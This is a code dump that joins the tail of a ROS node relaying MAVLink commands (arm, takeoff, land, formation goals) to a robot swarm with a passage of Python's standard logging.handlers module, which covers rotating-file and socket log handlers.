self.mav = mavutil.mavlink_connection("udpout:"+self.master_udp, source_system=self.master_sys_id)
if self.DEBUG:
rospy.logwarn("Master is connected on udpout:%s", self.master_udp)
self.ROBOT_STATE = 1
self.MASTER_CMD = 2
self.MASTER_CMD_ARM = 3
self.MASTER_CMD_TKO = 4
self.MASTER_CMD_LAND = 5
self.MASTER_CMD_POSCTL = 6
self.MASTER_CMD_HOLD = 7
self.MASTER_CMD_SHUTDOWN = 8
self.MASTER_CMD_REBOOT = 9
self.MASTER_CMD_SET_ORIGIN = 10
self.MASTER_CMD_SET_EAST = 11
self.MASTER_CMD_SET_nROBOTS = 12
self.MASTER_CMD_GO = 13
self.MASTER_CMD_GOAL = 14
self.MASTER_CMD_SET_TOALT = 15
self.MASTER_CMD_ACK = 16
# CMD string
self.CMD_STRING = {3:'MASTER_CMD_ARM', 4:'MASTER_CMD_TKO', 5:'MASTER_CMD_LAND', 6:'MASTER_CMD_POSCTL', 7:'MASTER_CMD_HOLD', 8:'MASTER_CMD_SHUTDOWN', 9:'MASTER_CMD_REBOOT', 10:'MASTER_CMD_SET_ORIGIN', 11:'MASTER_CMD_SET_EAST', 12:'MASTER_CMD_SET_nROBOTS', 13:'MASTER_CMD_GO', 14:'MASTER_CMD_GOAL', 15:'MASTER_CMD_SET_TOALT'}
# Topics names of robots locations in local defined ENU coordiantes
self.r_loc_topic_names = []
rstr = "/robot"
for i in range(self.n):
self.r_loc_topic_names.append(rstr+str(i)+"/state")
# Subscribers
rospy.Subscriber('/arm_robot', Int32, self.armCb)
rospy.Subscriber('/disarm_robot', Int32, self.disarmCb)
rospy.Subscriber('/takeoff_robot', Int32, self.tkoCb)
rospy.Subscriber('/land_robot', Int32, self.landCb)
rospy.Subscriber('/hold_robot', Int32, self.holdCb)
rospy.Subscriber('/posctl_robot', Int32, self.posctlCb)
rospy.Subscriber('/shutdown_robot', Int32, self.shutdownCb)
rospy.Subscriber('/reboot_robot', Int32, self.rebootCb)
rospy.Subscriber('/formation', FormationPositions, self.formationCb)
rospy.Subscriber('/go', Empty, self.goCb)
rospy.Subscriber('/setnRobots', Int32, self.nRCb)
rospy.Subscriber('/setOrigin', Point, self.setOriginCb)
rospy.Subscriber('/setEast', Point, self.setEastCb)
rospy.Subscriber("/setTOALT", Float32, self.setTOALTCb)
# Publishers
self.robot_state_pub_list = []
for i in range(self.n):
self.robot_state_pub_list.append(rospy.Publisher(self.r_loc_topic_names[i], RobotFormationState, queue_size=1))
def send_heartbeat(self):
""" Sends heartbeat msg to all vehicles
"""
self.mav.mav.heartbeat_send(mavutil.mavlink.MAV_TYPE_GCS, mavutil.mavlink.MAV_AUTOPILOT_INVALID, mavutil.mavlink.MAV_MODE_FLAG_CUSTOM_MODE_ENABLED, 0, mavutil.mavlink.MAV_STATE_UNINIT)
def recvCb(self):
# This callback will be running inside a Thread
while (True):
cmd = mavutil.mavlink.MAV_CMD_USER_1
msg = self.mav.recv_match(blocking=True)
if msg is not None:
cmd_type = msg.get_type()
src_sys = msg.get_srcSystem()
msg_tgt = msg.target_system
if cmd_type == "COMMAND_LONG" and src_sys > 0 and src_sys <= self.n and msg.command == cmd and msg_tgt == self.master_sys_id:
if msg.param1 == self.ROBOT_STATE:
if self.DEBUG:
rospy.logwarn("[Master]: Received ROBOT_STATE from Robot %s", src_sys-1)
state_msg = RobotFormationState()
state_msg.header.stamp = rospy.Time.now()
state_msg.received_goal = msg.param2
state_msg.mission_started = msg.param3
state_msg.arrived = msg.param4
state_msg.point.x = msg.param5
state_msg.point.y = msg.param6
state_msg.point.z = msg.param7
# publish msg to ROS
self.robot_state_pub_list[src_sys-1].publish(state_msg)
if msg.param1 == self.MASTER_CMD_ACK:
rospy.logwarn("[Master]: Got acknowledgment of %s from robot %s", self.CMD_STRING[msg.param2], src_sys-1)
else:
if self.DEBUG:
rospy.logwarn("Received unexpected MAVLink msg of type: %s from MAVLink ID = %s", msg.get_type(), msg.get_srcSystem())
# Should we sleep before we poll the udp again?
sleep(0.02)
##### Callbacks ###
def goCb(self, msg):
tgt_sys = 0 # to all
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_GO
p3, p4, p5, p6, p7 = 0, 0, 0, 0, 0
self.mav.mav.command_long_send(tgt_sys, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
rospy.logwarn("[Master]: Sent MASTER_CMD_GO to all systems")
def formationCb(self, msg):
tgt_comp_id = 0
for i in range(self.n):
tgt_sys = i+1
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_GOAL
p3 = msg.goals[i].x
p4 = msg.goals[i].y
p5 = msg.goals[i].z
p6 = msg.tf
p7 = 0
self.mav.mav.command_long_send(tgt_sys, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
rospy.logwarn("[Master]: Sent formation goal to Robot %s", i)
sleep(0.01)
def nRCb(self, msg):
r_id = 0 # to all
nR = msg.data
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_SET_nROBOTS
p3 = nR # number of robots
p4, p5, p6, p7 = 0, 0, 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
rospy.logwarn("[Master]: sending number of robots = %s to all robots", nR)
def setOriginCb(self, msg):
r_id = 0
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_SET_ORIGIN
p3 = msg.x
p4 = msg.y
p5 = msg.z
p6, p7 = 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
rospy.logwarn("[Master]: sending Origin coordinates to all robots")
def setEastCb(self, msg):
r_id = 0
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_SET_EAST
p3 = msg.x
p4 = msg.y
p5 = msg.z
p6, p7 = 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
rospy.logwarn("[Master]: sending East coordinates to all robots")
def setTOALTCb(self, msg):
if msg is not None:
r_id = 0
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_SET_TOALT
p3 = msg.data
p4, p5, p6, p7 = 0, 0, 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
rospy.logwarn("[Master]: sending TOALT=%s to all robots", msg.data)
def armCb(self, msg):
r_id = msg.data
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_ARM
p3 = 1 # 1: arm, 0: disarm
p4, p5, p6, p7 = 0, 0, 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
if r_id > 0:
rospy.logwarn("[Master]: sending CMD_ARM to robot with MAVLink ID = %s", r_id)
else:
rospy.logwarn("[Master]: sending CMD_ARM to all robots")
def disarmCb(self, msg):
r_id = msg.data
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_ARM
p3 = 0 # 1: arm, 0: disarm
p4, p5, p6, p7 = 0, 0, 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
if r_id > 0:
rospy.logwarn("[Master]: sending CMD_DISARM to robot with MAVLink ID = %s", r_id)
else:
rospy.logwarn("[Master]: sending CMD_DISARM to all robots")
def tkoCb(self, msg):
r_id = msg.data
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_TKO
p3, p4, p5, p6, p7 = 0, 0, 0, 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
if r_id > 0:
rospy.logwarn("[Master]: sending CMD_TAKEOFF to robot with MAVLink ID = %s", r_id)
else:
rospy.logwarn("[Master]: sending CMD_TAKEOFF to all robots")
def landCb(self, msg):
r_id = msg.data
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_LAND
p3, p4, p5, p6, p7 = 0, 0, 0, 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
if r_id > 0:
rospy.logwarn("[Master]: sending CMD_LAND to robot with MAVLink ID = %s", r_id)
else:
rospy.logwarn("[Master]: sending CMD_LAND to all robots")
def holdCb(self, msg):
r_id = msg.data
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_HOLD
p3, p4, p5, p6, p7 = 0, 0, 0, 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
if r_id > 0:
rospy.logwarn("[Master]: sending CMD_HOLD to robot with MAVLink ID = %s", r_id)
else:
rospy.logwarn("[Master]: sending CMD_HOLD to all robots")
def posctlCb(self, msg):
r_id = msg.data
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_POSCTL
p3, p4, p5, p6, p7 = 0, 0, 0, 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
if r_id > 0:
rospy.logwarn("[Master]: sending CMD_POSCTL to robot with MAVLink ID = %s", r_id)
else:
rospy.logwarn("[Master]: sending CMD_POSCTL to all robots")
def shutdownCb(self, msg):
r_id = msg.data
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_SHUTDOWN
p3, p4, p5, p6, p7 = 0, 0, 0, 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
if r_id > 0:
rospy.logwarn("[Master]: sending CMD_SHUTDOWN to robot with MAVLink ID = %s", r_id)
else:
rospy.logwarn("[Master]: sending CMD_SHUTDOWN to all robots")
def rebootCb(self, msg):
r_id = msg.data
tgt_comp_id = 0
p1 = self.MASTER_CMD
p2 = self.MASTER_CMD_REBOOT
p3, p4, p5, p6, p7 = 0, 0, 0, 0, 0
self.mav.mav.command_long_send(r_id, tgt_comp_id, mavutil.mavlink.MAV_CMD_USER_1, 0, p1, p2, p3, p4, p5, p6, p7)
if self.DEBUG:
if r_id > 0:
rospy.logwarn("[Master]: sending CMD_REBOOT to robot with MAVLink ID = %s", r_id)
else:
rospy.logwarn("[Master]: sending CMD_REBOOT to all robots")
def main():
rospy.init_node('master_mavlink_node', anonymous=True)
rospy.logwarn("Starting master_mavlink_node")
M = MasterBridge()
# Run recevCb in a thread
recvthread = Thread(target=M.recvCb)
recvthread.daemon = True
recvthread.start()
# ROS loop frequency, Hz
rate = rospy.Rate(2.0)
while not rospy.is_shutdown():
if M.ENABLE_MASTER_GCS:
M.send_heartbeat()
rate.sleep()
if __name__ == '__main__':
try:
main()
except rospy.ROSInterruptException:
pass
|
handlers.py
|
# Copyright 2001-2016 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Additional handlers for the logging package for Python. The core package is
based on PEP 282 and comments thereto in comp.lang.python.
Copyright (C) 2001-2016 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging.handlers' and log away!
"""
import io, logging, socket, os, pickle, struct, time, re
from stat import ST_DEV, ST_INO, ST_MTIME
import queue
import threading
import copy
#
# Some constants...
#
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514
_MIDNIGHT = 24 * 60 * 60 # number of seconds in a day
class BaseRotatingHandler(logging.FileHandler):
"""
Base class for handlers that rotate log files at a certain point.
Not meant to be instantiated directly. Instead, use RotatingFileHandler
or TimedRotatingFileHandler.
"""
namer = None
rotator = None
def __init__(self, filename, mode, encoding=None, delay=False, errors=None):
"""
Use the specified filename for streamed logging
"""
logging.FileHandler.__init__(self, filename, mode=mode,
encoding=encoding, delay=delay,
errors=errors)
self.mode = mode
self.encoding = encoding
self.errors = errors
def emit(self, record):
"""
Emit a record.
Output the record to the file, catering for rollover as described
in doRollover().
"""
try:
if self.shouldRollover(record):
self.doRollover()
logging.FileHandler.emit(self, record)
except Exception:
self.handleError(record)
def rotation_filename(self, default_name):
"""
Modify the filename of a log file when rotating.
This is provided so that a custom filename can be provided.
The default implementation calls the 'namer' attribute of the
handler, if it's callable, passing the default name to
it. If the attribute isn't callable (the default is None), the name
is returned unchanged.
:param default_name: The default name for the log file.
"""
if not callable(self.namer):
result = default_name
else:
result = self.namer(default_name)
return result
def rotate(self, source, dest):
"""
When rotating, rotate the current log.
The default implementation calls the 'rotator' attribute of the
handler, if it's callable, passing the source and dest arguments to
it. If the attribute isn't callable (the default is None), the source
is simply renamed to the destination.
:param source: The source filename. This is normally the base
filename, e.g. 'test.log'
:param dest: The destination filename. This is normally
what the source is rotated to, e.g. 'test.log.1'.
"""
if not callable(self.rotator):
# Issue 18940: A file may not have been created if delay is True.
if os.path.exists(source):
os.rename(source, dest)
else:
self.rotator(source, dest)
class RotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a set of files, which switches from one file
to the next when the current file reaches a certain size.
"""
def __init__(self, filename, mode='a', maxBytes=0, backupCount=0,
encoding=None, delay=False, errors=None):
"""
Open the specified file and use it as the stream for logging.
By default, the file grows indefinitely. You can specify particular
values of maxBytes and backupCount to allow the file to rollover at
a predetermined size.
Rollover occurs whenever the current log file is nearly maxBytes in
length. If backupCount is >= 1, the system will successively create
new files with the same pathname as the base file, but with extensions
".1", ".2" etc. appended to it. For example, with a backupCount of 5
and a base file name of "app.log", you would get "app.log",
"app.log.1", "app.log.2", ... through to "app.log.5". The file being
written to is always "app.log" - when it gets filled up, it is closed
and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
exist, then they are renamed to "app.log.2", "app.log.3" etc.
respectively.
If maxBytes is zero, rollover never occurs.
"""
# If rotation/rollover is wanted, it doesn't make sense to use another
# mode. If for example 'w' were specified, then if there were multiple
# runs of the calling application, the logs from previous runs would be
# lost if the 'w' is respected, because the log file would be truncated
# on each run.
if maxBytes > 0:
mode = 'a'
if "b" not in mode:
encoding = io.text_encoding(encoding)
BaseRotatingHandler.__init__(self, filename, mode, encoding=encoding,
delay=delay, errors=errors)
self.maxBytes = maxBytes
self.backupCount = backupCount
def doRollover(self):
"""
Do a rollover, as described in __init__().
"""
if self.stream:
self.stream.close()
self.stream = None
if self.backupCount > 0:
for i in range(self.backupCount - 1, 0, -1):
sfn = self.rotation_filename("%s.%d" % (self.baseFilename, i))
dfn = self.rotation_filename("%s.%d" % (self.baseFilename,
i + 1))
if os.path.exists(sfn):
if os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.rotation_filename(self.baseFilename + ".1")
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if not self.delay:
self.stream = self._open()
def shouldRollover(self, record):
"""
Determine if rollover should occur.
Basically, see if the supplied record would cause the file to exceed
the size limit we have.
"""
# See bpo-45401: Never rollover anything other than regular files
if os.path.exists(self.baseFilename) and not os.path.isfile(self.baseFilename):
return False
if self.stream is None: # delay was set...
self.stream = self._open()
if self.maxBytes > 0: # are we rolling over?
msg = "%s\n" % self.format(record)
self.stream.seek(0, 2) #due to non-posix-compliant Windows feature
if self.stream.tell() + len(msg) >= self.maxBytes:
return True
return False
class TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a file, rotating the log file at certain timed
intervals.
If backupCount is > 0, when rollover is done, no more than backupCount
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backupCount=0,
encoding=None, delay=False, utc=False, atTime=None,
errors=None):
encoding = io.text_encoding(encoding)
BaseRotatingHandler.__init__(self, filename, 'a', encoding=encoding,
delay=delay, errors=errors)
self.when = when.upper()
self.backupCount = backupCount
self.utc = utc
self.atTime = atTime
# Calculate the real rollover interval, which is just the number of
# seconds between rollovers. Also set the filename suffix used when
# a rollover occurs. Current 'when' events supported:
# S - Seconds
# M - Minutes
# H - Hours
# D - Days
# midnight - roll over at midnight
# W{0-6} - roll over on a certain day; 0 - Monday
#
# Case of the 'when' specifier is not important; lower or upper case
# will work.
if self.when == 'S':
self.interval = 1 # one second
self.suffix = "%Y-%m-%d_%H-%M-%S"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'M':
self.interval = 60 # one minute
self.suffix = "%Y-%m-%d_%H-%M"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'H':
self.interval = 60 * 60 # one hour
self.suffix = "%Y-%m-%d_%H"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}(\.\w+)?$"
elif self.when == 'D' or self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24 # one day
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
elif self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7 # one week
if len(self.when) != 2:
raise ValueError("You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s" % self.when)
if self.when[1] < '0' or self.when[1] > '6':
raise ValueError("Invalid day specified for weekly rollover: %s" % self.when)
self.dayOfWeek = int(self.when[1])
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
else:
raise ValueError("Invalid rollover interval specified: %s" % self.when)
self.extMatch = re.compile(self.extMatch, re.ASCII)
self.interval = self.interval * interval # multiply by units requested
# The following line added because the filename passed in could be a
# path object (see Issue #27493), but self.baseFilename will be a string
filename = self.baseFilename
if os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
else:
t = int(time.time())
self.rolloverAt = self.computeRollover(t)
def computeRollover(self, currentTime):
"""
Work out the rollover time based on the specified time.
"""
result = currentTime + self.interval
# If we are rolling over at midnight or weekly, then the interval is already known.
# What we need to figure out is WHEN the next interval is. In other words,
# if you are rolling over at midnight, then your base interval is 1 day,
# but you want to start that one day clock at midnight, not now. So, we
# have to fudge the rolloverAt value in order to trigger the first rollover
# at the right time. After that, the regular interval will take care of
# the rest. Note that this code doesn't care about leap seconds. :)
if self.when == 'MIDNIGHT' or self.when.startswith('W'):
# This could be done with less code, but I wanted it to be clear
if self.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
currentDay = t[6]
# r is the number of seconds left between now and the next rotation
if self.atTime is None:
rotate_ts = _MIDNIGHT
else:
rotate_ts = ((self.atTime.hour * 60 + self.atTime.minute)*60 +
self.atTime.second)
r = rotate_ts - ((currentHour * 60 + currentMinute) * 60 +
currentSecond)
if r < 0:
# Rotate time is before the current time (for example when
# self.rotateAt is 13:45 and it now 14:15), rotation is
# tomorrow.
r += _MIDNIGHT
currentDay = (currentDay + 1) % 7
result = currentTime + r
# If we are rolling over on a certain day, add in the number of days until
# the next rollover, but offset by 1 since we just calculated the time
# until the next day starts. There are three cases:
# Case 1) The day to rollover is today; in this case, do nothing
# Case 2) The day to rollover is further in the interval (i.e., today is
# day 2 (Wednesday) and rollover is on day 6 (Sunday). Days to
# next rollover is simply 6 - 2 - 1, or 3.
# Case 3) The day to rollover is behind us in the interval (i.e., today
# is day 5 (Saturday) and rollover is on day 3 (Thursday).
# Days to rollover is 6 - 5 + 3, or 4. In this case, it's the
# number of days left in the current week (1) plus the number
# of days in the next week until the rollover day (3).
# The calculations described in 2) and 3) above need to have a day added.
# This is because the above time calculation takes us to midnight on this
# day, i.e. the start of the next day.
if self.when.startswith('W'):
day = currentDay # 0 is Monday
if day != self.dayOfWeek:
if day < self.dayOfWeek:
daysToWait = self.dayOfWeek - day
else:
daysToWait = 6 - day + self.dayOfWeek + 1
newRolloverAt = result + (daysToWait * (60 * 60 * 24))
if not self.utc:
dstNow = t[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
result = newRolloverAt
return result
def shouldRollover(self, record):
"""
Determine if rollover should occur.
record is not used, as we are just comparing times, but it is needed so
the method signatures are the same
"""
# See bpo-45401: Never rollover anything other than regular files
if os.path.exists(self.baseFilename) and not os.path.isfile(self.baseFilename):
return False
t = int(time.time())
if t >= self.rolloverAt:
return True
return False
def getFilesToDelete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dirName, baseName = os.path.split(self.baseFilename)
fileNames = os.listdir(dirName)
result = []
# See bpo-44753: Don't use the extension when computing the prefix.
prefix = os.path.splitext(baseName)[0] + "."
plen = len(prefix)
for fileName in fileNames:
if fileName[:plen] == prefix:
suffix = fileName[plen:]
# See bpo-45628: The date/time suffix could be anywhere in the
# filename
parts = suffix.split('.')
for part in parts:
if self.extMatch.match(part):
result.append(os.path.join(dirName, fileName))
break
if len(result) < self.backupCount:
result = []
else:
result.sort()
result = result[:len(result) - self.backupCount]
return result
def doRollover(self):
"""
do a rollover; in this case, a date/time stamp is appended to the filename
when the rollover happens. However, you want the file to be named for the
start of the interval, not the current time. If there is a backup count,
then we have to get a list of matching filenames, sort them and remove
the one with the oldest suffix.
"""
if self.stream:
self.stream.close()
self.stream = None
# get the time that this sequence started at and make it a TimeTuple
currentTime = int(time.time())
dstNow = time.localtime(currentTime)[-1]
t = self.rolloverAt - self.interval
if self.utc:
timeTuple = time.gmtime(t)
else:
timeTuple = time.localtime(t)
dstThen = timeTuple[-1]
if dstNow != dstThen:
if dstNow:
addend = 3600
else:
addend = -3600
timeTuple = time.localtime(t + addend)
dfn = self.rotation_filename(self.baseFilename + "." +
time.strftime(self.suffix, timeTuple))
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if self.backupCount > 0:
for s in self.getFilesToDelete():
os.remove(s)
if not self.delay:
self.stream = self._open()
newRolloverAt = self.computeRollover(currentTime)
while newRolloverAt <= currentTime:
newRolloverAt = newRolloverAt + self.interval
#If DST changes and midnight or weekly rollover, adjust for this.
if (self.when == 'MIDNIGHT' or self.when.startswith('W')) and not self.utc:
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
self.rolloverAt = newRolloverAt
class WatchedFileHandler(logging.FileHandler):
"""
A handler for logging to a file, which watches the file
to see if it has changed while in use. This can happen because of
usage of programs such as newsyslog and logrotate which perform
log file rotation. This handler, intended for use under Unix,
watches the file to see if it has changed since the last emit.
(A file has changed if its device or inode have changed.)
If it has changed, the old file stream is closed, and the file
opened to get a new stream.
This handler is not appropriate for use under Windows, because
under Windows open files cannot be moved or renamed - logging
opens the files with exclusive locks - and so there is no need
for such a handler. Furthermore, ST_INO is not supported under
Windows; stat always returns zero for this value.
This handler is based on a suggestion and patch by Chad J.
Schroeder.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False,
errors=None):
if "b" not in mode:
encoding = io.text_encoding(encoding)
logging.FileHandler.__init__(self, filename, mode=mode,
encoding=encoding, delay=delay,
errors=errors)
self.dev, self.ino = -1, -1
self._statstream()
def _statstream(self):
if self.stream:
sres = os.fstat(self.stream.fileno())
self.dev, self.ino = sres[ST_DEV], sres[ST_INO]
def reopenIfNeeded(self):
"""
Reopen log file if needed.
Checks if the underlying file has changed, and if it
has, close the old stream and reopen the file to get the
current stream.
"""
# Reduce the chance of race conditions by stat'ing by path only
# once and then fstat'ing our new fd if we opened a new log stream.
# See issue #14632: Thanks to John Mulligan for the problem report
# and patch.
try:
# stat the file by path, checking for existence
sres = os.stat(self.baseFilename)
except FileNotFoundError:
sres = None
# compare file system stat with that of our stream file handle
if not sres or sres[ST_DEV] != self.dev or sres[ST_INO] != self.ino:
if self.stream is not None:
# we have an open file handle, clean it up
self.stream.flush()
self.stream.close()
self.stream = None # See Issue #21742: _open () might fail.
# open a new file handle and get new stat info from that fd
self.stream = self._open()
self._statstream()
def emit(self, record):
"""
Emit a record.
If underlying file has changed, reopen the file before emitting the
record to it.
"""
self.reopenIfNeeded()
logging.FileHandler.emit(self, record)
class SocketHandler(logging.Handler):
"""
A handler class which writes logging records, in pickle format, to
a streaming socket. The socket is kept open across logging calls.
If the peer resets it, an attempt is made to reconnect on the next call.
The pickle which is sent is that of the LogRecord's attribute dictionary
(__dict__), so that the receiver does not need to have the logging module
installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
When the attribute *closeOnError* is set to True - if a socket error
occurs, the socket is silently closed and then reopened on the next
logging call.
"""
logging.Handler.__init__(self)
self.host = host
self.port = port
if port is None:
self.address = host
else:
self.address = (host, port)
self.sock = None
self.closeOnError = False
self.retryTime = None
#
# Exponential backoff parameters.
#
self.retryStart = 1.0
self.retryMax = 30.0
self.retryFactor = 2.0
def makeSocket(self, timeout=1):
"""
A factory method which allows subclasses to define the precise
type of socket they want.
"""
if self.port is not None:
result = socket.create_connection(self.address, timeout=timeout)
else:
result = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
result.settimeout(timeout)
try:
result.connect(self.address)
except OSError:
result.close() # Issue 19182
raise
return result
def createSocket(self):
"""
Try to create a socket, using an exponential backoff with
a max retry time. Thanks to Robert Olson for the original patch
(SF #815911) which has been slightly refactored.
"""
now = time.time()
# Either retryTime is None, in which case this
# is the first time back after a disconnect, or
# we've waited long enough.
if self.retryTime is None:
attempt = True
else:
attempt = (now >= self.retryTime)
if attempt:
try:
self.sock = self.makeSocket()
self.retryTime = None # next time, no delay before trying
except OSError:
#Creation failed, so set the retry time and return.
if self.retryTime is None:
self.retryPeriod = self.retryStart
else:
self.retryPeriod = self.retryPeriod * self.retryFactor
if self.retryPeriod > self.retryMax:
self.retryPeriod = self.retryMax
self.retryTime = now + self.retryPeriod
def send(self, s):
"""
Send a pickled string to the socket.
This function allows for partial sends which can happen when the
network is busy.
"""
if self.sock is None:
self.createSocket()
#self.sock can be None either because we haven't reached the retry
#time yet, or because we have reached the retry time and retried,
#but are still unable to connect.
if self.sock:
try:
self.sock.sendall(s)
except OSError: #pragma: no cover
self.sock.close()
self.sock = None # so we can call createSocket next time
def makePickle(self, record):
"""
Pickles the record in binary format with a length prefix, and
returns it ready for transmission across the socket.
"""
ei = record.exc_info
if ei:
# just to get traceback text into record.exc_text ...
dummy = self.format(record)
# See issue #14436: If msg or args are objects, they may not be
# available on the receiving end. So we convert the msg % args
# to a string, save it as msg and zap the args.
d = dict(record.__dict__)
d['msg'] = record.getMessage()
d['args'] = None
d['exc_info'] = None
# Issue #25685: delete 'message' if present: redundant with 'msg'
d.pop('message', None)
s = pickle.dumps(d, 1)
slen = struct.pack(">L", len(s))
return slen + s
def handleError(self, record):
"""
Handle an error during logging.
An error has occurred during logging. Most likely cause -
connection lost. Close the socket so that we can retry on the
next event.
"""
if self.closeOnError and self.sock:
self.sock.close()
self.sock = None #try to reconnect next time
else:
logging.Handler.handleError(self, record)
def emit(self, record):
"""
Emit a record.
Pickles the record and writes it to the socket in binary format.
If there is an error with the socket, silently drop the packet.
If there was a problem with the socket, re-establishes the
socket.
"""
try:
s = self.makePickle(record)
self.send(s)
except Exception:
self.handleError(record)
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
sock = self.sock
if sock:
self.sock = None
sock.close()
logging.Handler.close(self)
finally:
self.release()
class DatagramHandler(SocketHandler):
"""
A handler class which writes logging records, in pickle format, to
a datagram socket. The pickle which is sent is that of the LogRecord's
attribute dictionary (__dict__), so that the receiver does not need to
have the logging module installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
